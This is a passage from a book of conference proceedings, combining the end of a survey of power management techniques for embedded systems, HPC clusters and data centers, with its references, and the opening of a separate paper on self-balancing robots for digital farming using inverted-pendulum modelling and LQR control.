described various power management techniques which considered the different
spatiotemporal characteristics of energy availability and energy usage within a system
and across network. As a conclusive remark, the study suggested that the entire system
from the design of architecture to the power management must be optimized in a
holistic way at the application and networking levels to operate harvesting systems
accurately.
Choi et al. [26] considered DC–DC converters when addressing the problem of minimizing
energy in embedded systems. The study analyzed the impact of the variation in the
efficiency of DC–DC converters while executing a single task and also while implementing
a DVS scheme. The study put forward the DC DVS technique for the
DC–DC converter to minimize its energy consumption, and the characteristics of DC–DC
converters were embedded into the DVS techniques to perform multiple tasks. Finally, the
study proposed a technique named DC CONF for generating a DC–DC converter and presented
an integrated framework that addresses the DC–DC converter configuration and DVS
simultaneously. The experimental results indicated that the proposed scheme saved up to
24.8% of energy when compared with existing power management schemes that do not take
the efficiency variation of DC–DC converters into account.
Park et al. [27] presented a compiler-based method for reducing leakage power during
code execution; the method relies on inserting power-gating instructions into the code
to activate/deactivate (i.e., turn ON/OFF) the functional units in a microprocessor. The
study proposed a polynomial-time optimal algorithm called PG-instr to minimize the total
leakage power while considering the power and delay overhead of power gating. The study
also found that the algorithm is adaptable to other power-gated resources such as
diverse memory units and multicores as well.

5 Power Management Techniques for HPC Clusters

Power management in HPC clusters focuses on increasing efficiency in terms of energy,
power capping, and thermal management. Pinheiro et al. [28] and Chase et al. [29]
reported energy-efficient techniques based on a load concentration policy (LCP) and on
service level agreements (SLA), respectively. Efficiency is attained through trade-offs,
by distributing the load and switching on nodes only when needed; idle servers undergo a
transition from a high power state to a low power state, thereby reducing the wastage of
energy. This system is primarily functional for homogeneous clusters, where all servers
are assigned the same application running at the same frequency. Other techniques for
increasing energy efficiency are popular data concentration and massive arrays of idle
disks, which conserve energy by keeping most disks idle and concentrating frequently
accessed data on a small number of active disks. The diverted access technique uses
redundancy to lengthen idle periods, thereby conserving disk energy. Power capping sets
a safe threshold on power consumption and regulates the cluster so that the actual power
does not surpass the fixed budget; this can also act as a safety mechanism to circumvent
power supply spikes [30]. The first step is sensing the power, followed by controlling
the power throttle. Examples of such controllers have been reported in [31–33]. In the
first case [31], the controller is complemented by a management agent running on each
server; this agent monitors local power through runtime power measurement and power
control. The controller periodically gathers the local readings, computes the total
power consumption of the cluster, and, when the total consumption crosses the estimated
power budget limit, throttles the servers to a predefined level. In the second case
[32], the power budget is distributed and allocated non-uniformly to each node depending
upon its power demand.
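The sense-then-throttle loop common to these controllers can be sketched as follows;
this is a simplified illustration rather than any cited system, and the per-node sensor
and throttle calls are placeholder stubs standing in for vendor interfaces such as IPMI
readings or RAPL counters.

```python
# Cluster-level power capping: aggregate per-node readings, throttle when over budget.
import random
import time

NODES = ["node01", "node02", "node03", "node04"]
POWER_BUDGET_W = 1200.0          # cluster-level cap chosen by the operator
CONTROL_PERIOD_S = 1.0

def read_node_power(node):
    """Stand-in for a per-node power sensor query (e.g., IPMI or RAPL)."""
    return random.uniform(250.0, 400.0)     # simulated reading in watts

def set_node_throttle(node, throttled):
    """Stand-in for a per-node throttle command (e.g., capping the DVFS frequency)."""
    print(f"{node}: {'throttled' if throttled else 'full speed'}")

for _ in range(3):                           # a few control cycles for illustration
    readings = {n: read_node_power(n) for n in NODES}
    total = sum(readings.values())
    over_budget = total > POWER_BUDGET_W
    print(f"total draw {total:.0f} W, budget {POWER_BUDGET_W:.0f} W")
    for node in NODES:
        # throttle every node to a predefined lower level while over budget,
        # and release the cap once the total consumption falls back under it
        set_node_throttle(node, throttled=over_budget)
    time.sleep(CONTROL_PERIOD_S)
```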

Wang and Chen [33] developed a new control algorithm, multi-input multi-output (MIMO)
control, for multiple servers working in harmony. Within every control cycle, the
controller collects the power consumption and CPU utilization of each server, calculates
a new CPU frequency for each processor, and directs each processor to alter its
frequency in a coordinated way.
Liu and Zhu [2] detailed the thermal management technique used in commercial
clusters which involves throttling or reducing the amount of dissipated heat. This
reduction is important as high temperatures make the systems unreliable and costly.
Skadron et al. [34] developed a proportional–integral–differential (PID) controller
to regulate the heat produced. It followed three steps: 1. proportional action, where
power was regulated to decrease the amount of errors, 2. integral action, where power
was adjusted corresponding to the time integral of errors occurred in the past and
maintained at a zero-error state, and finally 3. derivative action, where any overshoot
is circumvented by damping the response and providing stability to the controller.
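A generic PID sketch (an illustration of the control law above, not Skadron et al.'s
implementation; the gains, setpoint, and interpretation of the output are assumptions)
could look like this:

```python
# Generic PID controller driving a throttling signal toward a temperature setpoint.
class PID:
    def __init__(self, kp, ki, kd, setpoint):
        self.kp, self.ki, self.kd = kp, ki, kd
        self.setpoint = setpoint
        self.integral = 0.0
        self.prev_error = 0.0

    def update(self, measured, dt):
        error = measured - self.setpoint             # positive when too hot
        self.integral += error * dt                  # integral action: past errors
        derivative = (error - self.prev_error) / dt  # derivative action: damping
        self.prev_error = error
        # proportional + integral + derivative terms give the throttling level
        return self.kp * error + self.ki * self.integral + self.kd * derivative

controller = PID(kp=0.5, ki=0.05, kd=0.1, setpoint=70.0)   # 70 °C target
throttle = controller.update(measured=78.0, dt=1.0)        # one control step
print(f"requested throttling level: {throttle:.2f}")
```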
Taffoni et al. [35] evaluated the impact of computation on the energy consumption of two
applications from the astrophysical domain. The evaluation was done on three different
systems: an Intel-based cluster, a prototype of an exascale supercomputer, and a
microcluster based on ARM MPSoCs, which has the lowest energy consumption but at the
cost of slower performance.

6 Power Management in Data Centers

Data centers host a wide range of Internet facilities such as Web hosting, e-commerce
services, banking, retail commerce, and cloud computing. This wide range of functions
requires very high power, which in turn requires advanced cooling configurations. Energy
consumption in large-scale data centers therefore imposes high electricity costs, which
makes power and energy consumption the two main concerns in data centers. Expensive
uninterrupted power supplies and backup power generators are needed for peak power
requirements [36]. Power management techniques adopted for battery-held devices cannot
be used in the context of servers, because server workloads and operating environments
are different from those of battery-operated devices.
Chen et al. [37] proposed the first dedicated framework to reduce the energy
consumption in servers at hosting centers that run multiple applications to meet
performance-based service-level agreements (SLAs). The study used steady-state
queuing analysis, feedback control theory, and a hybrid mechanism that is based
on both steady-state queuing and feedback control theory. The study results proved
that the solutions provided by the framework were found to be more adaptive to the
workload behavior while performing server provisioning and speed control when
implemented with the help of real Web server traces.
The power consumption behavior of large-scale servers that execute different
classes of applications was studied by Fan et al. [30]. The study found that there
exists a distinct gap (about 40%) between the observed and theoretical power usage
values in data centers even while executing well-tuned applications. The study used a
modeling framework to estimate the power-saving efficiency of power management
schemes. The findings revealed that power and energy savings were found to be
greater at the cluster level (thousands of servers) than at the rack level (tens of servers).
The study pointed out the necessity of the systems to remain power efficient not only
across the activity range, but also during its peak performance.
Raghavendra et al. [38] presented a coordinated multilevel power management for
data centers. The study proposed a power management technique that combined dif-
ferent individual power management approaches. The simulation results were based
on 180 server traces from nine different real-world enterprises which demonstrated
the correctness, stability, and efficiency advantages of the solution proposed by the
study. Furthermore, the study with its unified model performed a detailed quantitative
sensitivity analysis regarding the impact of different architectures, implementation
styles, sizes of workload, and system design choices on power management.
Narayanan et al. [39] proposed a technique called “write off-loading” to conserve
energy in enterprise storage. The write requests on spun-down disks were temporar-
ily redirected to a persistent storage elsewhere in an enterprise data center. This in
turn alters the I/O access pattern that generates significant idle periods during which
the volume’s disks can be spun down. This saves the energy consumed. The study
analyzed potential savings using real-world traces collected from thirteen servers in
the data center. The findings showed that significant energy savings were achieved by
spinning down the idle disks. Also, as write off-loading creates longer idle periods, it
helps in saving large amounts of energy. The study validated the analysis by imple-
menting the write off-loading on a hardware testbed and measured its performance.
The evaluation confirms the analysis by showing 28–36% reduction in the energy
consumption by just spinning down the disks and 45–60% reduction by using write
off-loading.
Govindan et al. [40] designed a technique based on controlled provisioning, statis-
tical multiplexing, and over-booking for provisioning the power infrastructure in data
centers. The evaluation of a prototype data center proved the feasibility and benefits
of the technique. The study results show that the adopted technique achieved double
the CPW offered by the Power Distribution Unit executing TPC-W, an e-commerce
benchmark, by accurately identifying the peak power needs of hosted workloads.
A 10% overbooking in the PDU-based conclusions of power profiles yielded 20%
additional improvement in PDU throughput with minimal loss in performance.
Leverich et al. [41] used Per Core Power Gating (PCPG) for additional power
management in multicore processors. The study was conducted on a commercial 4-
core chip with the help of real-world application traces from enterprise environments.
PCPG was found to reduce 40% of the energy consumed by the processor without any
significant performance overheads. Furthermore, when compared with DVFS, PCPG
was found to be more effective in saving 30% more energy. The study suggested
to implement DVFS and PCPG together, which can save up to 60% of the power
consumed.
Liu et al. [42] addressed the challenges faced by elastic power management in
Internet data centers. They analyzed the resource provisioning and utilization patterns
in data centers and proposed a macroresource management layer that can coordinate
the various cyber and physical resources. They also reviewed some of the existing
solutions for resource management along with its limitations. The study pointed out
the importance of a coordination layer to aid in resource utilization after carefully
monitoring the cyber-activities and physical dynamics in data centers. The study
asserted it as a challenging goal that requires breakthroughs in many areas of research
such as data management, resource and software abstraction, sensing, modeling,
control, and system design. According to the study, the service requests that hit
the data centers must be coordinated with the physical resources to provide both
operational and energy efficiency.
Urgaonkar et al. [43] explored the power management and optimal resource allo-
cation in virtual data centers with heterogeneous applications and have time-varying
workloads. The study used the system queuing information in order to make online
control decisions. Furthermore, the study used a specific technique known as Lya-
punov optimization to design an online admission control, routing, and resource
allocation algorithm for a virtual data center. The findings revealed that the algo-
rithm maximizes a joint utility of the average application throughput and manages
the power and energy costs of the data center.
Beloglazov and Buyya [44] proposed a resource management policy for dealing with
power-performance trade-offs in cloud data centers. The findings of the study showed
that dynamically reallocating virtual machines and turning off idle nodes can save a
substantial amount of energy while still delivering the promised QoS.
Lin et al. [45] examined the amount of power saved by dynamically "right-sizing" the
data center. The servers were turned off during idle periods, and an online algorithm
was used to check the amount of power savings achieved. According to the study, the
simple structure of an optimal offline algorithm for dynamic right-sizing was exploited
to design a new lazy online algorithm that is 3-competitive. The study validated the
algorithm using traces from two real data center workloads and showed that significant
savings are possible when the peak-to-mean ratio (PMR) of the data center is greater
than 3, the cost of toggling a server is less than the cost of a few hours of server
operation, and the background load is less than 40%.

7 Conclusion

In this paper, we have reviewed various studies related to power management tech-
niques in embedded systems, HPC systems, HPC clusters, data centers, and virtual
environment.
The studies related to static power management reveal some major shortcomings, including
a lapse in the energy concerns related to multimedia applications, since that work
focused mainly on data management tasks [6]. Valentini et al. [11] pointed out the
limitations of the popular FAWN architecture and highlighted the concern regarding its
feasibility. They pointed
out that the FAWN approach cannot help with problems that cannot be parallelized or
whose working set cannot be further divided to fit into the available memory of the
smaller nodes.
Some of the major limitations that emerged from the in-depth review of power management
in embedded systems include the compatibility of the design models with high-power
devices [24] and the need to optimize the entire system, from design architecture to
power management, for the proper operation of these systems [25]. Studies related to
power management techniques for HPC systems showed a series of constraints and
shortcomings, including long request-time delay [46], energy-saving/time-delay
trade-offs [47], cooling cost and temperature thresholds [48], utilization thresholds
[49], failure rate, temperature constraints, power budget [50], and performance
[33, 51, 52].
The review of studies pertaining to dynamic power management revealed some of its
limitations, such as applicability of the models being limited to homogeneous systems
[20]. The energy savings were found to depend on the application, the system workload,
and the DVS strategy. Furthermore, most of the techniques were implemented manually and
should be replaced by modern automated ones [12].
The studies that describe the power management techniques adopted in various functional
areas revealed some major snags that need to be addressed and rectified. Reviews of the
studies on power management in data centers brought out a serious limitation regarding
the practical applicability of the frameworks, as many of them are only theoretical
works that have not been successfully implemented on any platform [37, 44].
The gaps mentioned above pave the way for designing an optimized power management
technique for HPC.

References

1. Shehabi, A., Smith, S., Sartor, D., Brown, R., Herrlin, M., Koomey, J., Masanet, E., Horner,
N., Azevedo, I., & Lintner, W. (2016). United states data center energy usage report.
2. Liu, Y., & Zhu, H. (2010). A survey of the research on power management techniques for
high-performance systems. Software: Practice and Experience, 40(11), 943–964.
3. Feng, W.-C. (2003). Making a case for efficient supercomputing. Queue, 1(7), 54.
4. Ge, R., Feng, X., Song, S., Chang, H.-C., Li, D., & Cameron, K. W. (2010). Powerpack: Energy
profiling and analysis of high-performance systems and applications. IEEE Transactions on
Parallel and Distributed Systems, 21(5), 658–671.
5. Pinheiro, E., Bianchini, R., & Dubnicki, C. (2006). Exploiting redundancy to conserve energy
in storage systems. ACM SIGMETRICS Performance Evaluation Review, 34(1), 15–26.
6. Rivoire, S., Shah, M. A., Ranganathan, P., & Kozyrakis, C. (2007) Joulesort: A balanced energy-
efficiency benchmark,” in Proceedings of the 2007 ACM SIGMOD international conference
on Management of data. ACM (pp. 365–376).
7. Caulfield, A. M., Grupp, L. M., & Swanson, S. (2009). Gordon: using flash memory to build fast,
power-efficient clusters for data-intensive applications. ACM Sigplan Notices, 44(3), 217–228.
8. Andersen, D. G., Franklin, J., Kaminsky, M., Phanishayee, A., Tan, L., & Vasudevan, V. (2009).
Fawn: A fast array of wimpy nodes. In: Proceedings of the ACM SIGOPS 22nd symposium on
Operating Systems Principles. ACM (pp. 1–14).

9. Hamilton, J. (2009). Cooperative expendable micro-slice servers (cems): low cost, low power
servers for internet-scale services. In Conference on Innovative Data Systems Research
(CIDR’09)(January 2009).
10. Vasudevan, V., Andersen, D., Kaminsky, M., Tan, L., Franklin, J., & Moraru, I. (2010). Energy-
efficient cluster computing with fawn: Workloads and implications. In Proceedings of the 1st
International Conference on Energy-Efficient Computing and Networking. ACM (pp. 195–
204).
11. Valentini, G. L., Lassonde, W., Khan, S. U., Min-Allah, N., Madani, S. A., Li, J., et al. (2013).
An overview of energy efficiency techniques in cluster computing systems. Cluster Computing,
1–13.
12. Ge, R., Feng, X., & Cameron, K. W. (2005). Improvement of power-performance efficiency
for high-end computing. In 19th IEEE International Proceedings on Parallel and Distributed
Processing Symposium, 2005. IEEE (pp. 8–pp).
13. Hotta, Y., Sato, M., Kimura, H., Matsuoka, S., Boku, T., & Takahashi, D. (2006). Profile-
based optimization of power performance by using dynamic voltage scaling on a pc cluster. In
Parallel and Distributed Processing Symposium, 2006. IPDPS 2006. 20th International. IEEE
(pp. 8–pp).
14. Rajamani, K., Hanson, H., Rubio, J., Ghiasi, S., & Rawson, F. (2006). Application-aware
power management. In 2006 IEEE International Symposium on Workload Characterization.
IEEE (pp. 39–48).
15. Freeh, V. W., Kappiah, N., Lowenthal, D. K., & Bletsch, T. K. (2008). Just-in-time dynamic
voltage scaling: Exploiting inter-node slack to save energy in mpi programs. Journal of Parallel
and Distributed Computing, 68(9), 1175–1185.
16. Khargharia, B., Hariri, S., & Yousif, M. S. (2008). Autonomic power and performance man-
agement for computing systems. Cluster computing, 11(2), 167–181.
17. Von Laszewski, G., Wang, L., Younge, A. J., & He, X. (2009) Power-aware scheduling of virtual
machines in dvfs-enabled clusters. In IEEE International Conference on Cluster Computing
and Workshops, 2009. CLUSTER’09. IEEE (pp. 1–10).
18. Huang, S., & Feng, W. (2009) Energy-efficient cluster computing via accurate workload char-
acterization. In Proceedings of the 2009 9th IEEE/ACM International Symposium on Cluster
Computing and the Grid. IEEE Computer Society (pp. 68–75).
19. Le Sueur, E., & Heiser, G. (2010) Dynamic voltage and frequency scaling: The laws of dimin-
ishing returns.
20. Alvarruiz, F., de Alfonso, C., Caballer, M., & Hernández, V. (2012). An energy manager for
high performance computer clusters. In 2012 IEEE 10th International Symposium on Parallel
and Distributed Processing with Applications (ISPA). IEEE (pp. 231–238).
21. Ozturk, O., Kandemir, M., & Chen, G. (2013). Compiler-directed energy reduction using
dynamic voltage scaling and voltage islands for embedded systems. IEEE Transactions on
Computers, 62(2), 268–278.
22. Pedram, M. (2001). Power optimization and management in embedded systems. In Proceedings
of the 2001 Asia and South Pacific Design Automation Conference. ACM (pp. 239–244).
23. Brock, B., & Rajamani, K. (2003). Dynamic power management for embedded systems [soc
design]. In SOC Conference, 2003. Proceedings. IEEE International [Systems-on-Chip]. IEEE
(pp. 416–419).
24. Agarwal, Y., Schurgers, C., & Gupta, R. (2005). Dynamic power management using on demand
paging for networked embedded systems. In Proceedings of the 2005 Asia and South Pacific
Design Automation Conference. ACM (pp. 755–759).
25. Raghunathan, V., & Chou, P. H. (2006). Design and power management of energy harvest-
ing embedded systems. In Proceedings of the 2006 international symposium on Low power
electronics and design. ACM (pp. 369–374).
26. Choi, Y., Chang, N., & Kim, T. (2007). Dc-dc converter-aware power management for low-
power embedded systems. IEEE Transactions on Computer-Aided Design of Integrated Circuits
and Systems, 26(8), 1367–1381.

27. Park, D., Lee, J., Kim, N. S., & Kim, T. (2010). Optimal algorithm for profile-based power
gating: A compiler technique for reducing leakage on execution units in microprocessors.
In Proceedings of the International Conference on Computer-Aided Design. IEEE Press (pp.
361–364).
28. Pinheiro, E., Bianchini, R., Carrera, E. V., & Heath, T. (2001). Load balancing and unbalancing
for power and performance in cluster-based systems. In Workshop on compilers and operating
systems for low power, Vol. 180. Barcelona, Spain (pp. 182–195).
29. Chase, J. S., Anderson, D. C., Thakar, P. N., Vahdat, A. M., & Doyle, R. P. (2001). Managing
energy and server resources in hosting centers. ACM SIGOPS operating systems review, 35(5),
103–116.
30. Fan, X., Weber, W.-D., & Barroso, L. A. (2007). Power provisioning for a warehouse-sized
computer. ACM SIGARCH Computer Architecture News, 35(2), 13–23.
31. Ranganathan, P., Leech, P., Irwin, D., & Chase, J. (2006). Ensemble-level power management
for dense blade servers. ACM SIGARCH Computer Architecture News, 34(2), 66–77.
32. Femal, M. E., & Freeh, V. W. (2005). Boosting data center performance through non-uniform
power allocation. In Proceedings of 2nd International Conference on Autonomic Computing,
2005. ICAC 2005. IEEE (pp. 250–261).
33. Wang, X., & Chen, M. (2008). Cluster-level feedback power control for performance optimiza-
tion. In IEEE 14th International Symposium on High Performance Computer Architecture,
2008. HPCA 2008. IEEE (pp. 101–110).
34. Skadron, K., Abdelzaher, T., & Stan, M. R. (2002). Control-theoretic techniques and thermal-
rc modeling for accurate and localized dynamic thermal management. In High-Performance
Computer Architecture, 2002. Proceedings. Eighth International Symposium on. IEEE (pp.
17–28).
35. Taffoni, G., Tornatore, L., Goz, D., Ragagnin, A., Bertocco, S., Coretti, I., Marazakis, M.,
Chaix, F., Plumidis, M., Katevenis, M., Panchieri, R., & Perna, G. (2019). Towards exascale:
Measuring the energy footprint of astrophysics hpc simulations. In 2019 15th International
Conference on eScience (eScience) (pp. 403–412).
36. Bianchini, R., & Rajamony, R. (2004). Power and energy management for server systems.
Computer, 37(11), 68–76.
37. Chen, Y., Das, A., Qin, W., Sivasubramaniam, A., Wang, Q., & Gautam, N. (2005). Manag-
ing server energy and operational costs in hosting centers. ACM SIGMETRICS Performance
Evaluation Review, 33(1), 303–314.
38. Raghavendra, R., Ranganathan, P., Talwar, V., Wang, Z., & Zhu, X. (2008). No power struggles:
Coordinated multi-level power management for the data center. ACM SIGARCH Computer
Architecture News, 36(1), 48–59.
39. Narayanan, D., Donnelly, A., & Rowstron, A. (2008). Write off-loading: Practical power man-
agement for enterprise storage. ACM Transactions on Storage (TOS), 4(3), 10.
40. Govindan, S., Choi, J., Urgaonkar, B., Sivasubramaniam, A., & Baldini, A. (2009). Statistical
profiling-based techniques for effective power provisioning in data centers. In Proceedings of
the 4th ACM European conference on Computer systems. ACM (pp. 317–330).
41. Leverich, J., Monchiero, M., Talwar, V., Ranganathan, P., & Kozyrakis, C. (2009). Power man-
agement of datacenter workloads using per-core power gating. IEEE Computer Architecture
Letters, 8(2), 48–51.
42. Liu, J., Zhao, F., Liu, X., & He, W. (2009). Challenges towards elastic power management in
internet data centers. In Distributed Computing Systems Workshops, 2009. ICDCS Workshops’
09. 29th IEEE International Conference on. IEEE (pp. 65–72).
43. Urgaonkar, R., Kozat, U. C., Igarashi, K., & Neely, M. J. (2010). Dynamic resource allocation
and power management in virtualized data centers. In Network Operations and Management
Symposium (NOMS), 2010 IEEE. IEEE (pp. 479–486).
44. Beloglazov, A., & Buyya, R. (2010). Energy efficient resource management in virtualized cloud
data centers. In Proceedings of the 2010 10th IEEE/ACM International Conference on Cluster,
Cloud and Grid Computing. IEEE Computer Society (pp. 826–831).
45. Lin, M., Wierman, A., Andrew, L. L., & Thereska, E. (2013). Dynamic right-sizing for power-
proportional data centers. IEEE/ACM Transactions on Networking (TON), 21(5), 1378–1391.
46. Colarelli, D., & Grunwald, D. (2002). Massive arrays of idle disks for storage archives. In Proceedings of the 2002 ACM/IEEE Conference on Supercomputing (pp. 1–11). IEEE Computer Society Press.
47. Freeh, V. W., & Lowenthal, D. K. (2005). Using multiple energy gears in mpi programs on a
power-scalable cluster. In Proceedings of the tenth ACM SIGPLAN Symposium on Principles
and Practice of Parallel Programming, (pp. 164–173).
48. Moore, J. D., Chase, J. S., Ranganathan, P., & Sharma, R. K. (2005). Making scheduling "cool": Temperature-aware workload placement in data centers. In USENIX Annual Technical Conference, General Track (pp. 61–75).
49. Heath, T., Centeno, A. P., George, P., Ramos, L., Jaluria, Y., & Bianchini, R. (2006). Mercury and
freon: Temperature emulation and management for server systems. ACM SIGARCH Computer
Architecture News, 34(5), 106–116.
50. Stoess, J., Lang, C., & Bellosa, F. (2007). Energy management for hypervisor-based virtual
machines. In USENIX annual technical conference, (pp. 1–14).
51. Verma, A., Ahuja, P., & Neogi, A. (2008). Pmapper: Power and migration cost aware application
placement in virtualized systems. In Proceedings of the 9th ACM/IFIP/USENIX International
Conference on Middleware. Springer, (pp. 243–264).
52. Leng, J., Hetherington, T., ElTantawy, A., Gilani, S., Kim, N. S., Aamodt, T. M., et al. (2013).
Gpuwattch: Enabling energy optimizations in gpgpus. ACM SIGARCH Computer Architecture
News, 41(3), 487–498.
Application of Robotics in Digital
Farming

Drishti Agarwal, Aakash Mangla, and Preeti Nagrath

Abstract Cultivation is the most labour-intensive field, as most of the work is done
manually by the farmer, which reduces productivity and quality. The cropping fields
are vast and require constant monitoring and care, which is difficult if done manually.
The paper aims at presenting a detailed study of the application of the self-balancing
robot in the field of digital farming and its advantages over the traditional methods.
The study will outline the use of a dynamic system like the inverted cart pendulum for
robot modelling. Further, it discusses the need for filtering techniques in the device
and introducing the theory behind the control system and controllers like the linear
quadratic regulator.

Keywords Accelerometer · Gyroscope · Inverted pendulum · High-pass filter · Low-pass filter · Tilt angle · Linear quadratic regulator

1 Introduction

Agriculture evolved through different stages, starting from the primitive agriculture stage, in which farmers practised traditional methods such as slash-and-burn farming and shifting cultivation to grow crops and fodder for the self-sufficiency of their family and cattle. Then came the stage of traditional agriculture, which accepted and gave financial and economic value to the profession of farming. Usage of synthetic fertilizers and pesticides along with electrically powered machines came into existence and provided agriculture with a business outlook and big markets. Digital farming, which involves the utilization of IoT-based devices and robotics, can be used in various fields like:
1. Database maintenance-The digitization in farming provides information about
climatic changes, farm areas in use, financial and economic conditions of the
market, etc. This digital data storage on the database provides easy and swift
access to information to our farmers.

D. Agarwal · A. Mangla (B) · P. Nagrath


Bharti Vidyapeeth’s College of Engineering, New Delhi, India
2. Realtime data collection-IoT and digitization together can achieve this task as
the various sensors can be employed to monitor the farmlands, soil, the vegetation
of the field, humidity, and moisture content of the soil. All this data collected is
updated in the database.
3. Geographical information system (GIS)-GIS is one of the most powerful tech-
nological tools that can study the geography of an area and form intelligent deci-
sions. The GIS model is employed with CPS, i.e. the central processing system.
The CPS is responsible for storing the data, storing the results generated by the
GPS model, and implementing them by instructing the digitized machinery.
4. Digitized agriculture machinery (DAM)-Through the analysis made by GIS and
GPS model together with the digitized agriculture machinery such as digitized
fertilizer control device, sowing device, irrigation control device, etc. perform
their operation on-field and store the real-time data over the database accordingly.
Before the onset of digitization in the field of agriculture, most of the tasks were
performed manually by the farmer, but today with advancement in technology, we
are provided with ample resources to reduce manual labour, thus reducing the highly
tiring and difficult fieldwork. Internet of things [1] is a branch of technology that
provides us with devices that can collect the data through sensors and can develop
a network layer for data processing and transmission. A self-balancing robot has a complex structure and design along with dynamic motion; as a result, the construction and development of the robot is a tedious task, but the following advantages of the device outweigh the development cost:
1. The Manoeuvrability-The ability of the device to move freely defines its manoeu-
vrability. Self-balancing robots are highly proficient in terms of manoeuvrability
due to the reduction in its turn radius. A four or three-wheeled robot will cover
a greater radius at turns due to structural limitations, but a two-wheeled self-
balancing robot reduces this turn radius value to zero, thus covering the minimum
area.
2. Stability-A two-wheeled self-balancing robot can balance itself in any given
terrain, which makes them suitable for travelling and transporting loads from one
place to another across uneven fields and land.
The advantages of a self-balancing robot make it a device suitable in the field of
digital agriculture, as agricultural plots and lands are uneven surfaces, that hinder the
movement of normal three or four-wheeled devices but with efficient manoeuvrability
and minimum turn radius, a self-balancing robot can easily traverse the fields for
monitoring purposes. In addition to this, a two-wheeled robot has reduced wheels
and a sleek and narrow-body structure, which makes it compact, thus increases
the locomotive capabilities across a crop field without damaging the crops. A two-
wheeler robot when loaded with the required sensors, will reduce manual labour by
technically monitoring the farmlands and providing real-time data through wireless
communication.
This paper presents an in-depth analysis of the application of such robots in digital
farming, as explained in Sect. 1. The main aim is the system modelling through
the inverted cart pendulum system that can be seen in Sect. 3 of the paper. Further,
Sect. 4 explains the concept of control systems, followed by the introduction to linear
quadratic regulator. Finally, Sect. 5 explains the implementation of filters for sensor
data through mathematical equations.

2 Literature Review

The two-wheeler robot emerged in the year 1986 under the guidance of Kazuo Yamafuji, a professor at Tokyo's University of Electro-Communications. He invented a robot similar to the inverted pendulum system which can effectively traverse the ground with two wheels. Since then, this type of robot system has been widely used in almost all fields, especially agriculture. There are multiple techniques to construct this device, either by using different control system and controller methods or by varying the type of filter. The paper [2] utilises an augmented PID controller to stabilise the robot based on the inverted cart pendulum. Similarly, the paper [3] shows the implementation of the linear quadratic regulator technique for balancing. Also, using unique sensors provides new features to the robot, improving its functionality, as seen in paper [4], which shows the implementation of ultrasonic sensors to avoid obstacles. Further, the motion sensors require filters which remove redundant signals or noise from the data. The paper [5] employs a complementary filter for a two-wheeler robot and presents the disadvantages of the Kalman filter for this purpose.

3 The Inverted Pendulum System

An inverted pendulum system is highly unstable and non-linear. This nature arises from its centre of mass being above the pivot point. This dynamic system modelling is used in two-wheeled robots due to the similarity in structure and non-linearity.
In Fig. 1, the point around which the pendulum moves is the pivot point. Due to gravity g, the pendulum has moved to a certain angle from the vertical axis. So, the torque generated by the system can be written as:

T = mgl \sin\varphi \qquad (1)

Using this equation and the Euler-Lagrange rule, we derive the following equations:

\ddot{\varphi}_g = \frac{g}{l} \sin\varphi \qquad (2)

\ddot{\varphi}_x = -\frac{\ddot{x}}{l} \cos\varphi \qquad (3)
Fig. 1 System of inverted cart pendulum

Now, the resulting rotational acceleration can be given as:

\ddot{\varphi} = \ddot{\varphi}_g + \ddot{\varphi}_x = \frac{g}{l} \sin\varphi - \frac{\ddot{x}}{l} \cos\varphi \qquad (4)
Applying the Laplace [6] method to the above equation generates the transfer function of the system.
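To make this step concrete, a short worked sketch is given below (an illustration only, assuming the standard small-angle linearization sin φ ≈ φ, cos φ ≈ 1 and zero initial conditions; the symbols are those of Eq. (4)):

% Linearize Eq. (4) for small tilt angles
\ddot{\varphi} \approx \frac{g}{l}\,\varphi - \frac{1}{l}\,\ddot{x}

% Take Laplace transforms with zero initial conditions
s^{2}\Phi(s) = \frac{g}{l}\,\Phi(s) - \frac{s^{2}}{l}\,X(s)

% Transfer function from cart position x to tilt angle phi
\frac{\Phi(s)}{X(s)} = \frac{-s^{2}}{l\,s^{2} - g}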

4 Control Systems and Controllers

A device, machine, or system is developed through the interconnection [7] and communication between its different components. The system must produce a certain response and output to accomplish the aim of its development; the control system is therefore the branch of control engineering that studies the response of a system so as to maintain the desired output under varied inputs and to ensure the stability of the system in different real-world scenarios. Control systems have been a part of historical inventions by ancient civilizations that developed systems catering to the needs of human activities. The configuration of the system's elements decides the type of control system to be applied. The two most commonly used are open-loop and closed-loop control systems. The open-loop configuration employs controllers and actuators to determine the response and output of the system (Fig. 2).

Fig. 2 Diagrammatic representation of the open-loop configuration [7]
Fig. 3 Diagrammatic representation of the closed-loop configuration [7]

The closed-loop configuration has the very important feature of feedback control: the sensors installed in the system provide a feedback signal, and the system then determines the deviation of the actual output from the desired output (Fig. 3).
While working on such systems, developers must study the modelling of the system, its complexity, and its configuration design, along with its physical application in real-world situations, because the selection of the control system involves both the device and its operating environment. For example, a control system algorithm responsible for switching an air conditioning device on/off may function differently according to the room where the device is installed.
The methodology and functioning of a control system can be seen through its controllers. These are techniques applied based on the modelling of the system to study its input signal, the output generated, its response, and the feedback. Apart from their other functions, these controllers tend to reduce noise from the signal, thus ensuring a highly stable dynamic system. Two-wheeler robots are balanced using the linear quadratic regulator (LQR) method of the control system. LQR [8] works on the principle of a cost function given as:

J = \sum_{k=0}^{n} \left( x_k^T Q x_k + u_k^T R u_k \right) \qquad (5)

For the system, the LQR method finds the gain matrix K that stabilises the state feedback:

u(t) = -K x(t) \qquad (6)
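As an illustration of how the gain matrix in Eq. (6) can be obtained in practice, the following is a minimal Python sketch using SciPy's discrete-time algebraic Riccati equation solver. The state-space matrices A and B below are placeholders standing in for a discretized, linearized robot model, and Q, R are example weights; none of these values are taken from the paper.

import numpy as np
from scipy.linalg import solve_discrete_are

# Placeholder discrete-time model x[k+1] = A x[k] + B u[k]
# (states: tilt angle and tilt rate; the numbers are illustrative only).
dt = 0.01
A = np.array([[1.0, dt],
              [15.0 * dt, 1.0]])
B = np.array([[0.0],
              [-1.5 * dt]])

# Example weights for the cost of Eq. (5): J = sum(x'Qx + u'Ru).
Q = np.diag([10.0, 1.0])
R = np.array([[1.0]])

# Solve the discrete-time algebraic Riccati equation, then K = (B'PB + R)^-1 B'PA.
P = solve_discrete_are(A, B, Q, R)
K = np.linalg.solve(B.T @ P @ B + R, B.T @ P @ A)

print("LQR gain K =", K)  # state feedback u[k] = -K x[k], as in Eq. (6)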

5 Tilt Angle and Its Measurement Using the Filter

The technology around us tends to generate data in the forms of image, audio, video,
speech, etc. All this data is accepted, received, and transmitted in the form of a
signal or waves to be precise. The signals generated from the data are readable by
devices and machines to process them further. Thus, the field of analysis, production,
and modifications of the signals is known as signal processing. The field of signal
processing helps in the functioning of sensors. It can efficiently reduce noise in the
